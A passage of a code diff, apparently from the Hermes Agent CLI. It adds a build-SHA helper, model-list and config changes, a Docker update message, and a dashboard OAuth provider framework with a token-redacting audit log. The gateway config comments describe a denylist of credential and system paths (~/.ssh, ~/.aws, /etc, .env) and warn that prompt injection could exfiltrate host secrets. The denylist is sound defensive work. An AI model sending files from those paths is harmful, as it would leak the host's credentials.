if baked:
return {"upstream": baked, "local": baked, "ahead": 0}
except Exception:
pass
return None
upstream = _git_short_hash(repo_dir, "origin/main")
local = _git_short_hash(repo_dir, "HEAD")
if not upstream or not local:
# Live-git lookup failed (e.g. shallow clone without origin/main).
# Fall back to the baked build SHA if available.
try:
from hermes_cli.build_info import get_build_sha
baked = get_build_sha(short=8)
if baked:
return {"upstream": baked, "local": baked, "ahead": 0}
except Exception:
pass
return None
ahead = 0
+51
@@ -0,0 +1,51 @@
"""
Baked-in build metadata for Hermes Agent.
Source installs report their git revision live via ``git rev-parse`` (see
``hermes_cli/dump.py`` and ``hermes_cli/banner.py``). That doesn't work inside
the published Docker image because ``.dockerignore`` excludes ``.git``, so
those callsites fall back to ``"(unknown)"`` / drop the banner suffix entirely.
To make ``hermes dump`` and the startup banner identify the exact commit the
image was built from, the Docker build writes the build-time ``$HERMES_GIT_SHA``
arg into ``<project_root>/.hermes_build_sha``. This module is the single
read-side helper consumed by both callsites, keeping the lookup in one place
so the file path and missing-file behaviour stay consistent.
Behaviour:
- Returns ``None`` when the file is absent. Source installs and dev images
built without the ``HERMES_GIT_SHA`` build-arg fall through to live-git
resolution in the caller, so non-Docker installs are unaffected.
- Returns ``None`` on any IO / decoding error. The build-sha is a nice-to-have
for support triage; nothing in the CLI is allowed to crash because of it.
- Truncates to ``short`` characters (default 8) to match the format used by
``git rev-parse --short=8`` throughout the codebase.
"""
from __future__ import annotations
from pathlib import Path
from typing import Optional
# Path is resolved relative to this module so it works regardless of cwd —
# matches the pattern used by ``banner._resolve_repo_dir``.
_BUILD_SHA_FILE = Path(__file__).parent.parent / ".hermes_build_sha"
def get_build_sha(short: int = 8) -> Optional[str]:
"""Return the baked-in build SHA, truncated to ``short`` chars, or None.
Reads ``<project_root>/.hermes_build_sha`` if present. The file is
written by the Dockerfile's ``HERMES_GIT_SHA`` build-arg and contains
the full 40-character commit hash on a single line.
"""
try:
if not _BUILD_SHA_FILE.is_file():
return None
sha = _BUILD_SHA_FILE.read_text(encoding="utf-8").strip()
except Exception:
return None
if not sha:
return None
return sha[:short] if short and short > 0 else sha
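The helper's three outcomes (truncated SHA, full SHA, `None`) can be checked against a temporary file. The sketch below uses a hypothetical `read_build_sha` that takes the path as an argument instead of the module-level `_BUILD_SHA_FILE`; the SHA value is made up.

```python
import tempfile
from pathlib import Path
from typing import Optional


def read_build_sha(path: Path, short: int = 8) -> Optional[str]:
    """Same logic as get_build_sha above, with the file path injected."""
    try:
        if not path.is_file():
            return None
        sha = path.read_text(encoding="utf-8").strip()
    except Exception:
        return None
    if not sha:
        return None
    return sha[:short] if short and short > 0 else sha


with tempfile.TemporaryDirectory() as tmp:
    sha_file = Path(tmp) / ".hermes_build_sha"
    # Placeholder 40-character hash standing in for a real commit SHA.
    sha_file.write_text("0123456789abcdef0123456789abcdef01234567\n", encoding="utf-8")
    short_sha = read_build_sha(sha_file)           # default 8-character form
    full_sha = read_build_sha(sha_file, short=0)   # short <= 0 returns the full hash
    missing = read_build_sha(Path(tmp) / "absent")  # absent file yields None
```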
+15 -7
@@ -29,21 +29,29 @@ DEFAULT_CODEX_MODELS: List[str] = [
# curated fallback so Pro users still see Spark in `/model` when live
# discovery is unavailable (offline first run, transient API failure).
"gpt-5.3-codex-spark",
"gpt-5.2-codex",
"gpt-5.1-codex-max",
"gpt-5.1-codex-mini",
# NOTE: gpt-5.2-codex / gpt-5.1-codex-max / gpt-5.1-codex-mini were
# previously listed here but the chatgpt.com Codex backend returns
# HTTP 400 "The '<model>' model is not supported when using Codex with
# a ChatGPT account." for all three on every ChatGPT Pro account we've
# tested (verified live 2026-05-27). Keeping them in the fallback list
# leaked dead slugs into /model when live discovery was unavailable
# (transient API failure, first-run before refresh) and surfaced HTTP 400
# crashes on selection. The Codex CLI public catalog still references
# these slugs, which is why they survived previously — but those entries
# describe the public OpenAI API, not the OAuth-backed Codex backend
# Hermes uses. Removed here. If OpenAI re-enables them on Codex backend,
# live discovery will pick them up automatically via _fetch_models_from_api.
]
_FORWARD_COMPAT_TEMPLATE_MODELS: List[tuple[str, tuple[str, ...]]] = [
("gpt-5.5", ("gpt-5.4", "gpt-5.4-mini", "gpt-5.3-codex")),
("gpt-5.4-mini", ("gpt-5.3-codex", "gpt-5.2-codex")),
("gpt-5.4", ("gpt-5.3-codex", "gpt-5.2-codex")),
("gpt-5.3-codex", ("gpt-5.2-codex",)),
("gpt-5.4-mini", ("gpt-5.3-codex",)),
("gpt-5.4", ("gpt-5.3-codex",)),
# Surface Spark whenever any compatible Codex template is present so
# accounts hitting the live endpoint with an older lineup still see
# Spark in the picker. Backend gates real availability by ChatGPT Pro
# entitlement; Hermes does not.
("gpt-5.3-codex-spark", ("gpt-5.3-codex", "gpt-5.2-codex")),
("gpt-5.3-codex-spark", ("gpt-5.3-codex",)),
]
+3 -1
@@ -63,6 +63,8 @@ class CommandDef:
COMMAND_REGISTRY: list[CommandDef] = [
# Session
CommandDef("start", "Acknowledge platform start pings without a reply", "Session",
gateway_only=True),
CommandDef("new", "Start a new session (fresh session ID + history)", "Session",
aliases=("reset",), args_hint="[name]"),
CommandDef("topic", "Enable or inspect Telegram DM topic sessions", "Session",
@@ -121,7 +123,7 @@ COMMAND_REGISTRY: list[CommandDef] = [
CommandDef("config", "Show current configuration", "Configuration",
cli_only=True),
CommandDef("model", "Switch model for this session", "Configuration",
aliases=("provider",), args_hint="[model] [--provider name] [--global]"),
aliases=("provider",), args_hint="[model] [--provider name] [--global] [--refresh]"),
CommandDef("codex-runtime", "Toggle codex app-server runtime for OpenAI/Codex models",
"Configuration", aliases=("codex_runtime",),
args_hint="[auto|codex_app_server]"),
+152 -19
@@ -345,6 +345,58 @@ def recommended_update_command() -> str:
return recommended_update_command_for_method(method)
# Long-form text for ``hermes update`` / ``--check`` when running inside the
# Docker image. Surfaced by ``cmd_update`` and ``_cmd_update_check`` in
# hermes_cli/main.py; lives here so the wording stays consistent and we
# don't grow two slightly-different copies.
#
# Why this matters:
# - The published image excludes ``.git`` (see .dockerignore), so the
# git-based update path can never succeed inside the container.
# - The pre-existing fallback message ("✗ Not a git repository. Please
# reinstall: curl ... install.sh") is actively misleading inside Docker
# — that script installs a *new* host-side Hermes, it doesn't update
# the running container.
# - The right action is ``docker pull`` + restart the container; this
# helper spells that out, with notes on tag pinning and config
# persistence so users don't get blindsided.
_DOCKER_UPDATE_MESSAGE = """\
``hermes update`` doesn't apply inside the Docker container.
Hermes Agent runs as a published image (nousresearch/hermes-agent), not a
git checkout; the container has no working tree to pull into. Update by
pulling a fresh image and restarting your container instead:
docker pull nousresearch/hermes-agent:latest
# then restart whatever started the container, e.g.:
docker compose up -d --force-recreate hermes-agent
# or, for ad-hoc runs, exit the current container and `docker run` again
Verify the new version after restart:
docker run --rm nousresearch/hermes-agent:latest --version
Notes:
If you pinned a specific tag (e.g. ``:v0.14.0``) the ``:latest`` tag
won't move your container — pull the newer tag you actually want, or
switch to ``:latest`` / ``:main`` for rolling updates. See available
tags at https://hub.docker.com/r/nousresearch/hermes-agent/tags
Your config and session history live under ``$HERMES_HOME`` (``/opt/data``
in the container, typically bind-mounted from the host) and persist
across image upgrades; re-pulling doesn't lose any state.
Running a fork? Build your own image with this repo's ``Dockerfile``
and replace the ``docker pull`` step with your build/push pipeline."""
def format_docker_update_message() -> str:
"""Return the user-facing message for ``hermes update`` inside Docker.
Centralised so ``cmd_update`` (the apply path) and ``_cmd_update_check``
(the dry-run path) share the same wording. See ``_DOCKER_UPDATE_MESSAGE``
above for the full rationale.
"""
return _DOCKER_UPDATE_MESSAGE
def format_managed_message(action: str = "modify this Hermes installation") -> str:
"""Build a user-facing error for managed installs."""
managed_system = get_managed_system() or "a package manager"
@@ -712,8 +764,7 @@ DEFAULT_CONFIG = {
"singularity_image": "docker://nikolaik/python-nodejs:python3.11-nodejs20",
"modal_image": "nikolaik/python-nodejs:python3.11-nodejs20",
"daytona_image": "nikolaik/python-nodejs:python3.11-nodejs20",
"vercel_runtime": "node24",
# Container resource limits (docker, singularity, modal, daytona, vercel_sandbox — ignored for local/ssh)
# Container resource limits (docker, singularity, modal, daytona — ignored for local/ssh)
"container_cpu": 1,
"container_memory": 5120, # MB (default 5GB)
"container_disk": 51200, # MB (default 50GB)
@@ -1181,6 +1232,44 @@ DEFAULT_CONFIG = {
# Set this to True to re-enable the surfaces with the understanding
# that the numbers are a local lower-bound estimate, not billing.
"show_token_analytics": False,
# OAuth gate configuration (engaged when ``--host`` is set and
# ``--insecure`` is not). The bundled Nous Portal plugin reads
# both keys at startup; they are the canonical surface for these
# settings. Each can be overridden by an environment variable —
# ``HERMES_DASHBOARD_OAUTH_CLIENT_ID`` and
# ``HERMES_DASHBOARD_PORTAL_URL`` respectively — and the env var
# wins when set to a non-empty value. The override path is what
# Fly.io's platform-secret injection uses to push the per-deploy
# client_id at provisioning time without operators needing to
# touch config.yaml. Local dev / non-Fly deploys can set either
# surface; missing values fall through to the plugin's defaults
# (no provider registered when ``client_id`` is empty;
# ``portal_url`` defaults to https://portal.nousresearch.com).
"oauth": {
"client_id": "", # agent:{instance_id} — Portal provisions this
"portal_url": "", # blank → use plugin default (production Portal)
},
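The override order described in the comment above (the env var wins when non-empty, then config.yaml, then the plugin default) can be sketched as follows. This is a minimal illustration, not the plugin's actual code: ``resolve_setting`` and its ``environ`` parameter are hypothetical names introduced here.

```python
import os
from typing import Mapping, Optional


def resolve_setting(
    env_name: str,
    config_value: str,
    default: str = "",
    environ: Optional[Mapping[str, str]] = None,
) -> str:
    """Hypothetical helper: env var (if non-empty) > config value > default."""
    env = os.environ if environ is None else environ
    env_value = env.get(env_name, "")
    if env_value:
        # A non-empty environment variable always wins.
        return env_value
    # An empty config value falls through to the default.
    return config_value or default


if __name__ == "__main__":
    fake_env = {"HERMES_DASHBOARD_OAUTH_CLIENT_ID": "agent:abc"}
    print(resolve_setting("HERMES_DASHBOARD_OAUTH_CLIENT_ID", "", environ=fake_env))
    print(resolve_setting(
        "HERMES_DASHBOARD_PORTAL_URL", "",
        default="https://portal.nousresearch.com", environ=fake_env,
    ))
```

Passing ``environ`` explicitly keeps the sketch testable without mutating the process environment.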
# Public URL override (env: ``HERMES_DASHBOARD_PUBLIC_URL``).
# When set, this is the complete authority — scheme + host +
# optional path prefix (e.g. ``https://example.com/hermes``) —
# the OAuth ``redirect_uri`` is built from. Set this for deploys
# behind reverse proxies that don't reliably forward
# ``X-Forwarded-Host`` / ``X-Forwarded-Proto`` / ``X-Forwarded-Prefix``
# (manual nginx setups, on-prem ingresses, custom-domain Fly
# deploys without proper proxy headers). When set,
# ``X-Forwarded-Prefix`` is IGNORED on the OAuth path because
# the operator has declared the public URL — we no longer need
# to guess from proxy headers, and stacking the prefix on top
# would double-prefix the common case where the prefix is
# already baked into ``public_url``. Leave empty to use the
# existing proxy-header reconstruction (the default).
#
# Validation: rejects values without ``http(s)://`` scheme or
# without a host, and any string containing quote / angle /
# whitespace / control characters. A malformed value silently
# falls through to request reconstruction rather than breaking
# the login flow.
"public_url": "",
},
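The ``public_url`` validation rules listed in the comment above (an ``http(s)://`` scheme, a host, and no quote / angle / whitespace / control characters) might look roughly like this. It is a sketch under those stated rules only; ``is_valid_public_url`` is a hypothetical name, and the real validator may differ in detail.

```python
from urllib.parse import urlsplit

# Quote and angle-bracket characters named in the config comment.
_FORBIDDEN_CHARS = frozenset("\"'<>")


def is_valid_public_url(value: str) -> bool:
    """Hypothetical check mirroring the documented validation rules."""
    if not value:
        return False
    for ch in value:
        # Reject quotes, angle brackets, whitespace and control characters.
        if ch in _FORBIDDEN_CHARS or ch.isspace() or ord(ch) < 0x20 or ord(ch) == 0x7F:
            return False
    try:
        parts = urlsplit(value)
        host = parts.hostname
    except ValueError:
        # urlsplit raises on some malformed authorities (e.g. bad IPv6 brackets).
        return False
    return parts.scheme in ("http", "https") and bool(host)


if __name__ == "__main__":
    for candidate in ("https://example.com/hermes", "example.com/hermes", "https://"):
        print(candidate, is_valid_public_url(candidate))
```

A caller following the documented behaviour would treat a ``False`` result as "fall through to proxy-header reconstruction" rather than as a fatal error.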
# Privacy settings
@@ -1637,6 +1726,15 @@ DEFAULT_CONFIG = {
# assignee to any installed profile. When unset, falls back to the
# default profile. A task never ends up with assignee=None.
"default_assignee": "",
# Per-profile concurrency cap (#21582). When set to a positive int,
# no single profile can have more than N workers running at once,
# even if the global max_in_progress / max_spawn caps would allow
# it. Tasks blocked this way defer to the next dispatcher tick.
# Unset (None) means "no per-profile cap" — backward-compatible
# with existing installs. Useful for fan-out workflows that would
# otherwise saturate one profile's local model / API quota /
# browser pool while leaving other profiles idle.
"max_in_progress_per_profile": None,
# When true, the kanban dispatcher auto-runs the decomposer on
# tasks that land in Triage (every dispatcher tick). When false,
# decomposition is manual via `hermes kanban decompose <id>` or
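The per-profile cap described for ``max_in_progress_per_profile`` can be illustrated with a small planning function. This is a sketch assuming the behaviour stated in the comment and commit message (running tasks count against the cap; blocked tasks are reported as ``(task_id, assignee, current_running_count)`` tuples); ``plan_spawns`` and its argument shapes are hypothetical, not the dispatcher's real API.

```python
from collections import Counter
from typing import Iterable, List, Optional, Tuple


def plan_spawns(
    ready: Iterable[Tuple[str, str]],
    running_assignees: Iterable[str],
    per_profile_cap: Optional[int],
) -> Tuple[List[str], List[Tuple[str, str, int]]]:
    """Hypothetical sketch: decide which ready tasks may spawn this tick.

    ``ready`` holds (task_id, assignee) pairs; ``running_assignees`` lists the
    assignee of every task that is already running.
    """
    running = Counter(running_assignees)  # one count per profile at tick start
    to_spawn: List[str] = []
    skipped_per_profile_capped: List[Tuple[str, str, int]] = []
    cap_active = per_profile_cap is not None and per_profile_cap > 0
    for task_id, assignee in ready:
        if cap_active and running[assignee] >= per_profile_cap:
            # Not a failure: the task simply waits for the next tick.
            skipped_per_profile_capped.append((task_id, assignee, running[assignee]))
            continue
        to_spawn.append(task_id)
        running[assignee] += 1  # a newly spawned worker also counts
    return to_spawn, skipped_per_profile_capped


if __name__ == "__main__":
    print(plan_spawns([("t1", "a"), ("t2", "a"), ("t3", "b")], ["a"], 2))
```

With a cap of ``None`` (the default) every ready task is eligible, which matches the backward-compatible behaviour the comment describes.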
@@ -1717,6 +1815,21 @@ DEFAULT_CONFIG = {
# Gateway settings — control how messaging platforms (Telegram, Discord,
# Slack, etc.) deliver agent-produced files as native attachments.
"gateway": {
# When false (default), any file path the agent emits is delivered
# as a native attachment as long as it isn't under the credential /
# system-path denylist (/etc, /proc, ~/.ssh, ~/.aws, ~/.hermes/.env,
# auth.json, etc.). This matches the symmetry of inbound delivery
# — we accept any document type the user uploads, and the agent
# can hand back any file that isn't a credential.
#
# When true, fall back to the older allowlist+recency-window
# behavior: files must live under the Hermes cache, under
# ``media_delivery_allow_dirs``, or be freshly produced inside the
# ``trust_recent_files_seconds`` window. Recommended for
# public-facing gateways where prompt injection from one user
# shouldn't be able to exfiltrate the host's secrets to that same
# user. Bridged to HERMES_MEDIA_DELIVERY_STRICT.
"strict": False,
# Extra directories from which model-emitted bare file paths may be
# uploaded as native gateway attachments. Files inside the Hermes
# cache (~/.hermes/cache/{documents,images,audio,video,screenshots})
@@ -1724,7 +1837,7 @@ DEFAULT_CONFIG = {
# (project dirs, scratch dirs, mounted shares). Accepts a list of
# absolute paths or a single os.pathsep-separated string. Bridged
# to HERMES_MEDIA_ALLOW_DIRS at gateway startup. Tilde paths are
# expanded.
# expanded. Honored in both default and strict mode.
"media_delivery_allow_dirs": [],
# When true, files whose mtime is within ``trust_recent_files_seconds``
# of "now" are trusted for native delivery even outside the cache /
@@ -1732,10 +1845,12 @@ DEFAULT_CONFIG = {
# PDFs the agent writes into a working directory. System paths
# (/etc, /proc, ~/.ssh, ~/.aws, etc.) remain blocked regardless.
# Disable to fall back to pure-allowlist mode. Bridged to
# HERMES_MEDIA_TRUST_RECENT_FILES.
# HERMES_MEDIA_TRUST_RECENT_FILES. Only consulted when ``strict``
# is true; in default mode the denylist alone gates delivery.
"trust_recent_files": True,
# Recency window in seconds. 600 (10 min) comfortably covers a
# multi-tool agent turn. Bridged to HERMES_MEDIA_TRUST_RECENT_SECONDS.
# Only consulted when ``strict`` is true.
"trust_recent_files_seconds": 600,
},
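The two delivery modes described in the ``gateway`` comments can be summarised in one decision function. The sketch below is an assumption-laden illustration: ``may_deliver`` is a hypothetical name, the denylist is only the subset of paths named in the comments, and the Hermes cache directory check is omitted for brevity.

```python
import os
import time
from pathlib import Path
from typing import Iterable, Optional

# Illustrative subset of the credential / system-path denylist.
_DENY_DIRS = ("/etc", "/proc", "~/.ssh", "~/.aws")


def _norm(path: str) -> Path:
    return Path(os.path.expanduser(path)).resolve()


def _is_under(path: Path, root: Path) -> bool:
    try:
        path.relative_to(root)
        return True
    except ValueError:
        return False


def may_deliver(
    path_str: str,
    *,
    strict: bool,
    allow_dirs: Iterable[str] = (),
    trust_recent: bool = True,
    recent_seconds: int = 600,
    now: Optional[float] = None,
) -> bool:
    """Hypothetical sketch of the default vs. strict delivery decision."""
    path = _norm(path_str)
    # The denylist applies in both modes.
    if any(_is_under(path, _norm(d)) for d in _DENY_DIRS):
        return False
    if not strict:
        return True  # default mode: the denylist alone gates delivery
    if any(_is_under(path, _norm(d)) for d in allow_dirs):
        return True  # allowlisted directory
    if not trust_recent:
        return False
    try:
        mtime = path.stat().st_mtime
    except OSError:
        return False
    current = time.time() if now is None else now
    return (current - mtime) <= recent_seconds  # recency window
```

The ``now`` parameter exists only so the recency window can be exercised deterministically.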
@@ -1905,13 +2020,25 @@ DEFAULT_CONFIG = {
},
# Paste collapse thresholds (TUI + CLI).
# collapse_threshold: paste collapses to a file reference when line count
# exceeds this value (bracketed paste, safe: appends to existing text).
# collapse_threshold_fallback: same but for the fallback heuristic used
# by terminals without bracketed paste support (destructive: replaces
# entire buffer). 0 = disabled.
#
# paste_collapse_threshold (default 5)
# Bracketed-paste handler. Pastes with this many newlines or more
# collapse to a file reference. Set 0 to disable.
#
# paste_collapse_threshold_fallback (default 5)
# Fallback heuristic for terminals without bracketed paste support.
# Same line count test but heuristically gated by chars-added /
# newlines-added to avoid false positives from normal typing.
# Set 0 to disable.
#
# paste_collapse_char_threshold (default 2000)
# Long single-line paste guard. Pastes whose total char length
# reaches this value collapse to a file reference even if line
# count is below the line threshold. Catches the "8000 chars of
# minified JSON / log output on one line" case. Set 0 to disable.
"paste_collapse_threshold": 5,
"paste_collapse_threshold_fallback": 0,
"paste_collapse_threshold_fallback": 5,
"paste_collapse_char_threshold": 2000,
# Config schema version - bump this when adding new required fields
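The line and character thresholds documented above combine as a simple either/or test. A minimal sketch, assuming only what the comments state (a paste collapses at "this many newlines or more" or when its length "reaches" the char threshold, and ``0`` disables a check); ``should_collapse_paste`` is a hypothetical name, and the fallback heuristic's chars-added / newlines-added gating is not modelled.

```python
def should_collapse_paste(
    text: str,
    line_threshold: int = 5,
    char_threshold: int = 2000,
) -> bool:
    """Hypothetical sketch of the bracketed-paste collapse decision."""
    # Line guard: this many newlines or more. 0 disables it.
    if line_threshold > 0 and text.count("\n") >= line_threshold:
        return True
    # Long single-line guard: total length reaches the threshold. 0 disables it.
    if char_threshold > 0 and len(text) >= char_threshold:
        return True
    return False


if __name__ == "__main__":
    print(should_collapse_paste("a\n" * 5))       # many short lines
    print(should_collapse_paste("x" * 8000))      # one long minified line
    print(should_collapse_paste("short paste"))   # stays inline
```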
@@ -2404,10 +2531,10 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"TAVILY_API_KEY": {
"description": "Tavily API key for AI-native web search, extract, and crawl",
"description": "Tavily API key for AI-native web search and extract",
"prompt": "Tavily API key",
"url": "https://app.tavily.com/home",
"tools": ["web_search", "web_extract", "web_crawl"],
"tools": ["web_search", "web_extract"],
"password": True,
"category": "tool",
},
@@ -2483,6 +2610,14 @@ OPTIONAL_ENV_VARS = {
"password": True,
"category": "tool",
},
"KREA_API_KEY": {
"description": "Krea API key for Krea 2 image generation (Medium + Large)",
"prompt": "Krea API key",
"url": "https://www.krea.ai/settings/api-tokens",
"tools": ["image_generate"],
"password": True,
"category": "tool",
},
"VOICE_TOOLS_OPENAI_KEY": {
"description": "OpenAI API key for voice transcription (Whisper) and OpenAI TTS",
"prompt": "OpenAI API Key (for Whisper STT + TTS)",
@@ -2883,8 +3018,8 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_KEY": {
"description": "Bearer token for API server authentication. Required for non-loopback binding; server refuses to start without it. On loopback (127.0.0.1), all requests are allowed if empty.",
"prompt": "API server auth key (required for network access)",
"description": "Bearer token for API server authentication. Required whenever the API server is enabled; server refuses to start without it.",
"prompt": "API server auth key",
"url": None,
"password": True,
"category": "messaging",
@@ -2899,7 +3034,7 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_HOST": {
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — server refuses to start without API_SERVER_KEY.",
"description": "Host/bind address for the API server (default: 127.0.0.1). API_SERVER_KEY is still required even on loopback binds.",
"prompt": "API server host",
"url": None,
"password": False,
@@ -5227,9 +5362,6 @@ def show_config():
print(f" Daytona image: {terminal.get('daytona_image', 'nikolaik/python-nodejs:python3.11-nodejs20')}")
daytona_key = get_env_value('DAYTONA_API_KEY')
print(f" API key: {'configured' if daytona_key else '(not set)'}")
elif terminal.get('backend') == 'vercel_sandbox':
print(f" Vercel runtime: {terminal.get('vercel_runtime', 'node24')}")
print(f" Vercel auth: {'configured' if get_env_value('VERCEL_OIDC_TOKEN') or (get_env_value('VERCEL_TOKEN') and get_env_value('VERCEL_PROJECT_ID') and get_env_value('VERCEL_TEAM_ID')) else '(not set)'}")
elif terminal.get('backend') == 'ssh':
ssh_host = get_env_value('TERMINAL_SSH_HOST')
ssh_user = get_env_value('TERMINAL_SSH_USER')
@@ -5426,9 +5558,10 @@ def set_config_value(key: str, value: str):
"terminal.singularity_image": "TERMINAL_SINGULARITY_IMAGE",
"terminal.modal_image": "TERMINAL_MODAL_IMAGE",
"terminal.daytona_image": "TERMINAL_DAYTONA_IMAGE",
"terminal.vercel_runtime": "TERMINAL_VERCEL_RUNTIME",
"terminal.docker_mount_cwd_to_workspace": "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE",
"terminal.docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
"terminal.docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
"terminal.docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
"terminal.docker_env": "TERMINAL_DOCKER_ENV",
# terminal.cwd intentionally excluded — CLI resolves at runtime,
# gateway bridges it in gateway/run.py. Persisting to .env causes
@@ -0,0 +1,40 @@
"""Dashboard authentication provider framework.
The dashboard auth gate engages only when the dashboard binds to a
non-loopback host without ``--insecure``. In that mode, every request must
carry a verified session from one of the registered ``DashboardAuthProvider``
plugins.
The Nous provider lives in ``plugins/dashboard-auth-nous/`` and is the
default. Third parties register their own providers via the plugin hook
``ctx.register_dashboard_auth_provider``.
"""
from hermes_cli.dashboard_auth.base import (
DashboardAuthProvider,
Session,
LoginStart,
InvalidCodeError,
ProviderError,
RefreshExpiredError,
assert_protocol_compliance,
)
from hermes_cli.dashboard_auth.registry import (
register_provider,
get_provider,
list_providers,
clear_providers,
)
__all__ = [
"DashboardAuthProvider",
"Session",
"LoginStart",
"InvalidCodeError",
"ProviderError",
"RefreshExpiredError",
"assert_protocol_compliance",
"register_provider",
"get_provider",
"list_providers",
"clear_providers",
]
@@ -0,0 +1,87 @@
"""Audit log for dashboard-auth events.
Profile-aware location: ``$HERMES_HOME/logs/dashboard-auth.log``.
Format: one JSON object per line. Token-like fields are stripped before
serialisation to avoid leaking refresh tokens or JWTs to disk.
This module deliberately keeps a minimal dependency surface (no imports
from ``hermes_constants`` or other hermes_cli modules) so it can be
imported safely from middleware code that loads early in the startup
sequence.
"""
from __future__ import annotations
import datetime as _dt
import enum
import json
import logging
import os
import threading
from pathlib import Path
from typing import Any
_log = logging.getLogger(__name__)
_write_lock = threading.Lock()
# Field names that must never appear in the log raw. Any kwarg matching
# these is silently dropped.
_REDACTED_FIELDS: frozenset = frozenset({
"access_token", "refresh_token", "code", "code_verifier",
"state", "ticket", "cookie", "Authorization", "authorization",
})
class AuditEvent(enum.Enum):
"""Event types written to dashboard-auth.log.
Values are the literal ``event`` field on the JSON line.
"""
LOGIN_START = "login_start"
LOGIN_SUCCESS = "login_success"
LOGIN_FAILURE = "login_failure"
LOGOUT = "logout"
REFRESH_SUCCESS = "refresh_success"
REFRESH_FAILURE = "refresh_failure"
REVOKE = "revoke"
SESSION_VERIFY_FAILURE = "session_verify_failure"
WS_TICKET_MINTED = "ws_ticket_minted"
WS_TICKET_REJECTED = "ws_ticket_rejected"
def _resolve_log_path() -> Path:
"""``$HERMES_HOME/logs/dashboard-auth.log`` with the standard fallback.
Mirrors ``hermes_constants.get_hermes_home`` semantics: env var wins,
else ``~/.hermes``. A local copy avoids an import cycle with the
middleware which lives below ``hermes_cli``.
"""
home = os.environ.get("HERMES_HOME") or str(Path.home() / ".hermes")
return Path(home) / "logs" / "dashboard-auth.log"
def audit_log(event: AuditEvent, **fields: Any) -> None:
"""Append one event to the audit log.
Token-like fields are dropped. A missing log directory is created.
Write failures are logged at WARNING but never raise: auth must not
fail because the audit logger broke.
"""
safe_fields = {
k: v for k, v in fields.items()
if k not in _REDACTED_FIELDS
}
entry = {
"ts": _dt.datetime.now(_dt.timezone.utc).isoformat(),
"event": event.value,
**safe_fields,
}
line = json.dumps(entry, separators=(",", ":")) + "\n"
path = _resolve_log_path()
try:
path.parent.mkdir(parents=True, exist_ok=True)
with _write_lock:
with open(path, "a", encoding="utf-8") as f:
f.write(line)
except Exception as e:
_log.warning("dashboard-auth audit log write failed: %s", e)
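Because the log is one JSON object per line with an ``event`` field, it is easy to consume with the standard library. The following is a small reader sketch, not part of the module: ``count_audit_events`` is a hypothetical helper, and it assumes only the line format described in the docstring above.

```python
import json
from collections import Counter
from typing import Iterable


def count_audit_events(lines: Iterable[str]) -> Counter:
    """Hypothetical helper: tally audit events by their ``event`` value."""
    counts: Counter = Counter()
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            # Skip partially written or corrupted lines.
            continue
        if isinstance(entry, dict) and isinstance(entry.get("event"), str):
            counts[entry["event"]] += 1
    return counts


if __name__ == "__main__":
    sample = [
        '{"ts":"2025-01-01T00:00:00+00:00","event":"login_start"}',
        '{"ts":"2025-01-01T00:00:05+00:00","event":"login_success","user_id":"u1"}',
        "not json",
    ]
    print(count_audit_events(sample))
```

In practice the ``lines`` argument could be an open file handle on ``$HERMES_HOME/logs/dashboard-auth.log``.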
@@ -0,0 +1,158 @@
"""Abstract base + dataclasses + exceptions for dashboard auth providers."""
from __future__ import annotations
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import Optional
@dataclass(frozen=True)
class Session:
"""A verified identity. Returned by ``complete_login`` and ``verify_session``.
All fields are mandatory. Providers that don't have a concept of orgs
should set ``org_id`` to an empty string. ``access_token`` and
``refresh_token`` are opaque to Hermes (provider-specific).
"""
user_id: str
email: str
display_name: str
org_id: str
provider: str
expires_at: int # unix seconds; the access_token's exp claim
access_token: str
refresh_token: str
@dataclass(frozen=True)
class LoginStart:
"""First leg of the OAuth round trip.
``redirect_url`` is the URL the browser must navigate to (e.g. the
Portal's ``/oauth/authorize``). ``cookie_payload`` is a dict of cookie
name -> serialised value that the auth route will ``Set-Cookie`` on the
response. Used for PKCE state, CSRF nonces, etc. Cookies set here MUST
be HttpOnly + Secure (when over HTTPS) + SameSite=Lax with a TTL of at
most 10 minutes (the login lifetime).
"""
redirect_url: str
cookie_payload: dict[str, str]
class ProviderError(Exception):
"""IDP unreachable, network error, or other transient failure.
Middleware translates this to HTTP 503.
"""
class InvalidCodeError(Exception):
"""The OAuth callback ``code`` / ``state`` failed validation.
Middleware translates this to HTTP 400.
"""
class RefreshExpiredError(Exception):
"""The refresh token is dead.
Middleware clears cookies and forces re-login (302 ``/login``).
"""
class DashboardAuthProvider(ABC):
"""Protocol every dashboard-auth provider plugin implements.
Lifecycle:
1. ``start_login``: user clicks "Log in with X" on the login page.
Provider returns a redirect URL and any PKCE/CSRF state to stash
in short-lived cookies.
2. Browser bounces through the OAuth IDP and lands at /auth/callback.
3. ``complete_login``: exchange the code + verifier for a Session.
4. ``verify_session``: called on every request to validate the
access token in the cookie. Returns ``None`` if the token is
expired or invalid (middleware then triggers refresh or logout).
5. ``refresh_session``: called when the access token is near expiry.
Returns a new Session with rotated tokens.
6. ``revoke_session``: called on /auth/logout. Best-effort.
Failure semantics:
* ``start_login`` may raise ``ProviderError`` if the IDP is
unreachable.
* ``complete_login`` raises ``InvalidCodeError`` on bad code/state;
``ProviderError`` if the IDP is unreachable.
* ``verify_session`` returns ``None`` on expiry / unknown token;
raises ``ProviderError`` if the IDP is unreachable. Middleware
treats expiry and unreachable differently (expiry -> refresh;
unreachable -> 503).
* ``refresh_session`` raises ``RefreshExpiredError`` when the
refresh token is also invalid; middleware then forces re-login.
Raises ``ProviderError`` on network failure.
* ``revoke_session`` is best-effort and must not raise.
Subclasses MUST set ``name`` (lowercase identifier, stable forever)
and ``display_name`` (user-facing label on the login page).
"""
name: str = ""
display_name: str = ""
@abstractmethod
def start_login(self, *, redirect_uri: str) -> LoginStart: ...
@abstractmethod
def complete_login(
self,
*,
code: str,
state: str,
code_verifier: str,
redirect_uri: str,
) -> Session: ...
@abstractmethod
def verify_session(self, *, access_token: str) -> Optional[Session]: ...
@abstractmethod
